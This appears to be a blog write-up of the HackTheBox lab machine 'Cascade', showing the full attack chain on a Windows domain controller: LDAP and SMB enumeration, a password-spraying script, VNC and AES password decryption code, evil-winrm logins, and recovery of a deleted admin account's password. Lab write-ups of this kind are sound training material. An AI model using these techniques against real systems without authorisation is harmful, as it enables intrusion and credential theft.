HackTheBox - Cascade

16 minute read

Cascade was a cool 30 point box created by VbScrub. It started out with some LDAP enumeration that allowed you to find a Base64 encoded password which you then use to log into SMB, after that you discover a VNC encrypted password which you can crack using an interactive ruby shell and then use to login via WinRM to get user. After that you have to decrypt a password from an audit database file utilising some C#, you then login and discover you have the AD Recycle Bin group privileges allowing you to recover a temporary administrator password. You then login as admin and get root.

User.txt

Nmap


A quick nmap scan reveals the following ports:

# nmap -sT -p- --min-rate 5000 10.10.10.182

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown

Focusing on the more important ports we get the following information:

# nmap -sV -sC -T4 10.10.10.182 -p 53,389,445

PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 
445/tcp open  microsoft-ds?
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m48s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-07-24T10:16:45
|_  start_date: 2020-07-24T04:15:36


SMB


Running nullinux you’re able to acquire a list of valid users from the host:

# nullinux -users 10.10.10.182                                         
                                         
    Starting nullinux v5.4.1 | 07-24-2020 06:12
                                                 
[*] Enumerating Domain Information for: 10.10.10.182
[+] Domain Name: CASCADE                                                          
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453 
[+] Group: Domain Users
    administrator
    krbtgt
    arksvc
    s.smith
    r.thompson
    util
    j.wakefield
    s.hickson
    j.goodhand
    a.turnbull
    e.crowe
    b.hanson
    d.burman
    BackupSvc
    j.allen
    i.croft

I saved these to a file as they may come in handy at a later stage. I couldn’t access/list any shares anonymously so I moved on to check out what information could be extracted from LDAP.


LDAP


The following command will dump information held with the Person object class - user information (logon count, samaccountname, etc.)

# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)'

# CascGuest, Users, cascade.local                                                                                                                                       
dn: CN=CascGuest,CN=Users,DC=cascade,DC=local                                                                                                                           
objectClass: top                                                                  
objectClass: person                                                               
objectClass: organizationalPerson                                                 
objectClass: user                                                                 
cn: CascGuest                                                                     
description: Built-in account for guest access to the computer/domain             
distinguishedName: CN=CascGuest,CN=Users,DC=cascade,DC=local                      
instanceType: 4                                                                   
whenCreated: 20200109153140.0Z                                                                                                                                      
whenChanged: 20200110160637.0Z                                                    
uSNCreated: 8197                                                                  
memberOf: CN=Guests,CN=Builtin,DC=cascade,DC=local                                  
uSNChanged: 45094                    
name: CascGuest                      
objectGUID:: LrFX+qgBukGjmV+ZFABrZw==
userAccountControl: 66082
badPwdCount: 0    
codePage: 0       
countryCode: 0     
badPasswordTime: 0                                                                
lastLogoff: 0                                                                     
lastLogon: 0                                                                       
pwdLastSet: 0                                                                      
primaryGroupID: 514                                                                
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJF9QEAAA==                              
accountExpires: 9223372036854775807                                               
logonCount: 0                                                                     
sAMAccountName: CascGuest                                                          
sAMAccountType: 805306368                                                          
userPrincipalName: CascGuest@cascade.local                                         
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local            
isCriticalSystemObject: TRUE            
dSCorePropagationData: 20200117033736.0Z  
dSCorePropagationData: 20200117001404.0Z  
dSCorePropagationData: 20200109175934.0Z  
dSCorePropagationData: 20200109154857.0Z  
dSCorePropagationData: 16010714223649.0Z  
lastLogonTimestamp: 132230700642958462    

# CASC-DC1, Domain Controllers, cascade.local                                       
dn: CN=CASC-DC1,OU=Domain Controllers,DC=cascade,DC=local 
...

This dumps a lot of information, however using grep we can narrow down the output significantly based on supplied keywords:

# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)' | grep -i samaccountname
sAMAccountName: CascGuest
sAMAccountName: CASC-DC1$
sAMAccountName: arksvc
sAMAccountName: s.smith
sAMAccountName: r.thompson
sAMAccountName: util
sAMAccountName: j.wakefield
sAMAccountName: s.hickson
sAMAccountName: j.goodhand
sAMAccountName: a.turnbull
sAMAccountName: e.crowe
sAMAccountName: b.hanson
sAMAccountName: d.burman
sAMAccountName: BackupSvc
sAMAccountName: j.allen
sAMAccountName: i.croft

I decided to grep for specific strings like password, secret, key, user, etc. but these returned nothing particularly interesting.

A common factor to check for is the logonCount (to identify live accounts) and badPwdCount (identify accounts with potentially weak passwords). I grepped for the string pwd and was surprised when I saw cascadeLegacyPwd in the output:

# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)' | grep -i pwd
badPwdCount: 0
pwdLastSet: 0
badPwdCount: 0
pwdLastSet: 132400377614404824
badPwdCount: 0
pwdLastSet: 132230603002172876
badPwdCount: 0
pwdLastSet: 132247150854857364
badPwdCount: 0
pwdLastSet: 132230718862636251
cascadeLegacyPwd: clk0bjVldmE=
badPwdCount: 0
pwdLastSet: 132233548311955855
badPwdCount: 0
pwdLastSet: 132230756844150124
badPwdCount: 0
pwdLastSet: 132233522678003963
badPwdCount: 0
pwdLastSet: 132233532260320793
badPwdCount: 0
pwdLastSet: 132233533933579732
badPwdCount: 0
pwdLastSet: 132233607021669462
badPwdCount: 0
pwdLastSet: 132234069391538655
badPwdCount: 0
pwdLastSet: 132234069729591249
badPwdCount: 0
pwdLastSet: 132234070231912131
badPwdCount: 0
pwdLastSet: 132234098399165604
badPwdCount: 0
pwdLastSet: 132235983818652005

The password is Base64 encoded and decodes to rY4n5eva

# echo clk0bjVldmE= | base64 -d; echo
rY4n5eva

My crackmapexec install was not working at the time so I made a quick bash script to see which user the password was for:

#!/bin/bash

for i in $(cat /root/users)
do
    echo "User: $i"
    smbmap -H 10.10.10.182 -u $i -p rY4n5eva
done

Running the script shows that r.thompson is the correct user:

# ./smb.sh 
User: arksvc
[!] Authentication error on 10.10.10.182
User: s.smith
[!] Authentication error on 10.10.10.182
User: r.thompson
[+] IP: 10.10.10.182:445        Name: 10.10.10.182                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Audit$                                                  NO ACCESS
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        SYSVOL                                                  READ ONLY       Logon server share 
User: util
[!] Authentication error on 10.10.10.182
User: j.wakefield
[!] Authentication error on 10.10.10.182
User: s.hickson
[!] Authentication error on 10.10.10.182
User: j.goodhand
[!] Authentication error on 10.10.10.182
User: a.turnbull
[!] Authentication error on 10.10.10.182
User: e.crowe
[!] Authentication error on 10.10.10.182
User: b.hanson
[!] Authentication error on 10.10.10.182
User: d.burman
[!] Authentication error on 10.10.10.182
User: BackupSvc
[!] Authentication error on 10.10.10.182
User: j.allen
[!] Authentication error on 10.10.10.182
User: i.croft
[!] Authentication error on 10.10.10.182


SMB


The Data share caught my eye, the references to the AD Recycle Bin were interesting aswell as a VNC Install.reg file:

# smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva -R 'Data'
[+] IP: 10.10.10.182:445        Name: 10.10.10.182                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Data                                                    READ ONLY
        .\Data\*
        dr--r--r--                0 Tue Jan 28 17:05:51 2020    .
        dr--r--r--                0 Tue Jan 28 17:05:51 2020    ..
        dr--r--r--                0 Sun Jan 12 20:45:14 2020    Contractors
        dr--r--r--                0 Sun Jan 12 20:45:10 2020    Finance
        dr--r--r--                0 Tue Jan 28 13:04:51 2020    IT
        dr--r--r--                0 Sun Jan 12 20:45:20 2020    Production
        dr--r--r--                0 Sun Jan 12 20:45:16 2020    Temps
        .\Data\IT\*
        dr--r--r--                0 Tue Jan 28 13:04:51 2020    .
        dr--r--r--                0 Tue Jan 28 13:04:51 2020    ..
        dr--r--r--                0 Tue Jan 28 13:00:30 2020    Email Archives
        dr--r--r--                0 Tue Jan 28 13:04:51 2020    LogonAudit
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    Logs
        dr--r--r--                0 Tue Jan 28 17:06:59 2020    Temp
        .\Data\IT\Email Archives\*
        dr--r--r--                0 Tue Jan 28 13:00:30 2020    .
        dr--r--r--                0 Tue Jan 28 13:00:30 2020    ..
        fr--r--r--             2522 Tue Jan 28 13:00:30 2020    Meeting_Notes_June_2018.html
        .\Data\IT\Logs\*
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    .
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    ..
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    Ark AD Recycle Bin
        dr--r--r--                0 Tue Jan 28 19:56:00 2020    DCs
        .\Data\IT\Logs\Ark AD Recycle Bin\*
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    .
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    ..
        fr--r--r--             1303 Tue Jan 28 20:19:11 2020    ArkAdRecycleBin.log
        .\Data\IT\Logs\DCs\*
        dr--r--r--                0 Tue Jan 28 19:56:00 2020    .
        dr--r--r--                0 Tue Jan 28 19:56:00 2020    ..
        fr--r--r--             5967 Sun Jan 26 17:22:05 2020    dcdiag.log
        .\Data\IT\Temp\*
        dr--r--r--                0 Tue Jan 28 17:06:59 2020    .
        dr--r--r--                0 Tue Jan 28 17:06:59 2020    ..
        dr--r--r--                0 Tue Jan 28 17:06:55 2020    r.thompson
        dr--r--r--                0 Tue Jan 28 15:00:05 2020    s.smith
        .\Data\IT\Temp\s.smith\*
        dr--r--r--                0 Tue Jan 28 15:00:05 2020    .
        dr--r--r--                0 Tue Jan 28 15:00:05 2020    ..
        fr--r--r--             2680 Tue Jan 28 15:00:01 2020    VNC Install.reg

I decided to login and recursively downloaded every file in the share using smbclient:

# smbclient \\\\10.10.10.182\\Data -U=r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020

                13106687 blocks of size 4096. 7797638 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (7.6 KiloBytes/sec) (average 7.6 KiloBytes/sec) 
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (4.0 KiloBytes/sec) (average 5.8 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (18.1 KiloBytes/sec) (average 9.9 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (8.1 KiloBytes/sec) (average 9.4 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
smb: \>

The output is then saved locally to Kali:

# ls
Contractors  Finance  IT  Production  Temps

You can then see the files that’ve been downloaded:

# find . -type f
./IT/Temp/s.smith/VNC Install.reg
./IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
./IT/Logs/DCs/dcdiag.log
./IT/Email Archives/Meeting_Notes_June_2018.html

The ArkAdRecycleBin.log file contained some interesting information:

# cat IT/Logs/Ark\ AD\ Recycle\ Bin/ArkAdRecycleBin.log 
1/10/2018 15:43 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD]   Validating settings...
1/10/2018 15:43 [MAIN_THREAD]   Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD]   Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD]   Validating settings...
2/10/2018 15:56 [MAIN_THREAD]   Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD]   Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD]   Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD]   Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD]   Validating settings...
8/12/2018 12:22 [MAIN_THREAD]   Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD]   Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD]   Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local 
8/12/2018 12:22 [MAIN_THREAD]   Exiting with error code 0

Although, this is of no particular use to us now. The VNC Install.reg file however contained an interesting string: "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

# cat IT/Temp/s.smith/VNC\ Install.reg 
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""


VNC Password Decryption


Googling around to identify and decrypt the string I came across the following page on Github. The article states that using an interactive ruby shell from Msfconsole you’re able to decrypt the string in 3 easy steps:

msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6bcf2a4b6e5aca0f"].pack('H*'), fixedkey
=> "sT333ve2"

The password is sT333ve2. As the file was in the s.smith share we can presume that this is the password for that account.


Flag


This holds true and you can simply login with evil-winrm and type the user flag:

# evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..
*Evil-WinRM* PS C:\Users\s.smith> type desktop/user.txt
aad2e8...


Root.txt

SMB


There wasn’t much to offer on the host logged in as s.smith so I decided to check out what shares the account had access to:

# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2
[+] IP: 10.10.10.182:445        Name: 10.10.10.182                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Audit$                                                  READ ONLY
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        SYSVOL                                                  READ ONLY       Logon server share 

The Audit$ share stands out immediately. Recursively listing the contents of the share displays some interesting looking files:

# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R 'Audit$'
[+] IP: 10.10.10.182:445        Name: 10.10.10.182                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Audit$                                                  READ ONLY
        .\Audit$\*
        dr--r--r--                0 Wed Jan 29 13:01:26 2020    .
        dr--r--r--                0 Wed Jan 29 13:01:26 2020    ..
        fr--r--r--            13312 Tue Jan 28 16:47:08 2020    CascAudit.exe
        fr--r--r--            12288 Wed Jan 29 13:01:26 2020    CascCrypto.dll
        dr--r--r--                0 Tue Jan 28 16:43:18 2020    DB
        fr--r--r--               45 Tue Jan 28 18:29:47 2020    RunAudit.bat
        fr--r--r--           363520 Tue Jan 28 15:42:18 2020    System.Data.SQLite.dll
        fr--r--r--           186880 Tue Jan 28 15:42:18 2020    System.Data.SQLite.EF6.dll
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    x64
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    x86
        .\Audit$\DB\*
        dr--r--r--                0 Tue Jan 28 16:43:18 2020    .
        dr--r--r--                0 Tue Jan 28 16:43:18 2020    ..
        fr--r--r--            24576 Tue Jan 28 16:43:18 2020    Audit.db
        .\Audit$\x64\*
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    .
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    ..
        fr--r--r--          1639936 Tue Jan 28 15:42:18 2020    SQLite.Interop.dll
        .\Audit$\x86\*
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    .
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    ..
        fr--r--r--          1246720 Tue Jan 28 15:42:18 2020    SQLite.Interop.dll

I then downloaded all of them using smbclient:

# smbclient \\\\10.10.10.182\\Audit$ -U=s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 13:01:26 2020
  ..                                  D        0  Wed Jan 29 13:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 16:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 13:00:20 2020
  DB                                  D        0  Tue Jan 28 16:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 18:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 02:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 02:38:38 2019
  x64                                 D        0  Sun Jan 26 17:25:27 2020
  x86                                 D        0  Sun Jan 26 17:25:27 2020

                13106687 blocks of size 4096. 7796288 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \CascAudit.exe of size 13312 as CascAudit.exe (32.6 KiloBytes/sec) (average 32.6 KiloBytes/sec)
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (37.2 KiloBytes/sec) (average 34.6 KiloBytes/sec)
getting file \DB\Audit.db of size 24576 as Audit.db (75.7 KiloBytes/sec) (average 47.2 KiloBytes/sec)
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.1 KiloBytes/sec) (average 36.3 KiloBytes/sec)
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (704.4 KiloBytes/sec) (average 217.9 KiloBytes/sec)
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (177.7 KiloBytes/sec) (average 203.6 KiloBytes/sec) 
getting file \x64\SQLite.Interop.dll of size 1639936 as SQLite.Interop.dll (1324.6 KiloBytes/sec) (average 535.0 KiloBytes/sec)
getting file \x86\SQLite.Interop.dll of size 1246720 as SQLite.Interop.dll (805.2 KiloBytes/sec) (average 607.9 KiloBytes/sec)
smb: \>


File Analysis


The Audit.db file caught my eye initially so I decided to open it up in sqliteonline.com and see if it contained any juicy info. Running SELECT * FROM ldap; in the console displays the username ArkSvc and what appears to be a Base64 encoded password:


I attempted to Base64 decode the password but it just spat out some random junk. Based upon this and the CascCrypto.dll in the share I presumed the password was encrypted in some way (in addition to Base64).


dnSpy


Throwing the DLL into dnSpy allowed me to see if there was a decrypt function that could be used to get the plaintext password for the ArkSvc account.


As you can see the encrypted string and the key are required for the decrypt function. I couldn’t find the key in the DLL so I chucked the CascAudit.exe executable into dnSpy to try and find the key.

After a quick look around I found the key in the following location:



Decrypt Function


I copied the decrypt function from the DLL into the dotnetfiddle.net online C# compiler, with a couple of small additions to write the decrypted string in the console output and so the code would run correctly:

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;


public class Crypto
{
  public static void Main()
		
	{
		Console.WriteLine(DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321"));
	}
	public static string DecryptString(string EncryptedString, string Key)
	{
		byte[] array = Convert.FromBase64String(EncryptedString);
		Aes aes = Aes.Create();
		aes.KeySize = 128;
		aes.BlockSize = 128;
		aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
		aes.Mode = CipherMode.CBC;
		aes.Key = Encoding.UTF8.GetBytes(Key);
		string @string;
		using (MemoryStream memoryStream = new MemoryStream(array))
		{
			using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read)) 
			{
				byte[] array2 = new byte[checked(array.Length - 1 + 1)];
				cryptoStream.Read(array2, 0, array2.Length);
				@string = Encoding.UTF8.GetString(array2);
			}
		}
		return @string;
	}

		// Token: 0x04000006 RID: 6
	public const string DefaultIV = "1tdyjCbY1Ix49842";

		// Token: 0x04000007 RID: 7
	public const int Keysize = 128;
}

Running the code displays the following decrypted password: w3lc0meFr31nd


You can then evil-winrm into the host with ArkSvc / w3lc0meFr31nd credentials:

# evil-winrm -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc


AD Recycle Bin


Running whoami /all you’ll notice the we’re a member of the AD Recycle Bin group:

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group 
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group 
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group 
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group 
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Earlier on you may recall that we encountered an ArkAdRecycleBin.log log file found in the Data SMB share:

# cat IT/Logs/Ark\ AD\ Recycle\ Bin/ArkAdRecycleBin.log 
1/10/2018 15:43 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD]   Validating settings...
1/10/2018 15:43 [MAIN_THREAD]   Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD]   Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD]   Validating settings...
2/10/2018 15:56 [MAIN_THREAD]   Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD]   Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD]   Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD]   Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD]   Validating settings...
8/12/2018 12:22 [MAIN_THREAD]   Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD]   Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD]   Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local 
8/12/2018 12:22 [MAIN_THREAD]   Exiting with error code 0

The TempAdmin entry looks interesting, let’s check if any of the deleted items contain some sensitive information. We can do so using the following command:

Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property * 

This returns a lot of information, however the last entry has some juicy details:

accountExpires                  : 9223372036854775807                                
badPasswordTime                 : 0                        
badPwdCount                     : 0                  
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin                 
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059               
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz                              
CN                              : TempAdmin                                             
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059          
codePage                        : 0                                             
countryCode                     : 0                                                 
Created                         : 1/27/2020 3:23:08 AM                                         
createTimeStamp                 : 1/27/2020 3:23:08 AM     
Deleted                         : True                
Description                     :                                
DisplayName                     : TempAdmin                                
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local 
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}      
givenName                       : TempAdmin                       
instanceType                    : 4                                                 
isDeleted                       : True                                              
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local                
lastLogoff                      : 0                                                 
lastLogon                       : 0                                                 
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM                              
modifyTimeStamp                 : 1/27/2020 3:24:34 AM                              
msDS-LastKnownRDN               : TempAdmin                                   
Name                            : TempAdmin                                    
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059       
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity  
ObjectCategory                  :                                                   
ObjectClass                     : user                                              
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059              
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136    
primaryGroupID                  : 513                                            
ProtectedFromAccidentalDeletion : False                                             
pwdLastSet                      : 132245689883479503                                
sAMAccountName                  : TempAdmin                                                              
sDRightsEffective               : 0                                                              
userAccountControl              : 66048                                             
userPrincipalName               : TempAdmin@cascade.local                           
uSNChanged                      : 237705                                            
uSNCreated                      : 237695                                            
whenChanged                     : 1/27/2020 3:24:34 AM                              
whenCreated                     : 1/27/2020 3:23:08 AM    

Right at the top you’ll notice the following: cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz. Decrypting the Base64 encoded string displays the following password:

# echo YmFDVDNyMWFOMDBkbGVz | base64 -d; echo
baCT3r1aN00dles

Presumably belonging to the admin.


Flag


You can then simply login via WinRM and type the root flag:

# evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> type desktop\root.txt
6bc0ba...